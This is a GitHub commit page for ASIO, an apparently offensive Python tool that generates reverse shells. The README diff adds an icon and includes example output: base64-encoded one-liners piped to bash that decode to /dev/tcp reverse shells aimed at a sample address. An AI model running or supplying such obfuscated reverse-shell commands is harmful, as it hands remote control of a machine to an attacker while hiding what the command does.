Skip to content

Commit

Permalink
Added beautiful icon - I spent 3 hours :)
Browse files Browse the repository at this point in the history
  • Loading branch information
jackrendor committed Sep 27, 2020
1 parent 151548d commit b311e1b
Show file tree
Hide file tree
Showing 2 changed files with 7 additions and 3 deletions.
10 changes: 7 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,7 @@
<p align="center">
<img src="icon.png">
</p>

# ASIO
## Description
ASIO (All Shell In One) is a tool written in Python3 that generates reverse shells. It has the ability to **cast a one liner that uses all the available reverse shell teqniques**
Expand Down Expand Up @@ -37,10 +41,10 @@ Command:
Output:
```
sh in dev tcp
echo "IHNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84MDgwIDA+JjE=" | base64 -d | bash
echo IHNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84MDgwIDA+JjE= | base64 -d | bash
exec sh in dev tcp
echo "IDA8JjE5NjtleGVjIDE5Njw+L2Rldi90Y3AvMTI3LjAuMC4xLzgwODA7IHNoIDwmMTk2ID4mMTk2IDI+JjE5Ng==" | base64 -d | bash
echo IDA8JjE5NjtleGVjIDE5Njw+L2Rldi90Y3AvMTI3LjAuMC4xLzgwODA7IHNoIDwmMTk2ID4mMTk2IDI+JjE5Ng== | base64 -d | bash
```

### Generate one liner with all the available teqniques encoded in base64
Expand All @@ -51,7 +55,7 @@ Command:
Output:
```
All in one
echo "KCBzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjE<more base64>" | base64 -d | bash
echo KCBzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjE<more base64> | base64 -d | bash
```


Expand Down
Binary file added icon.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit b311e1b

Please sign in to comment.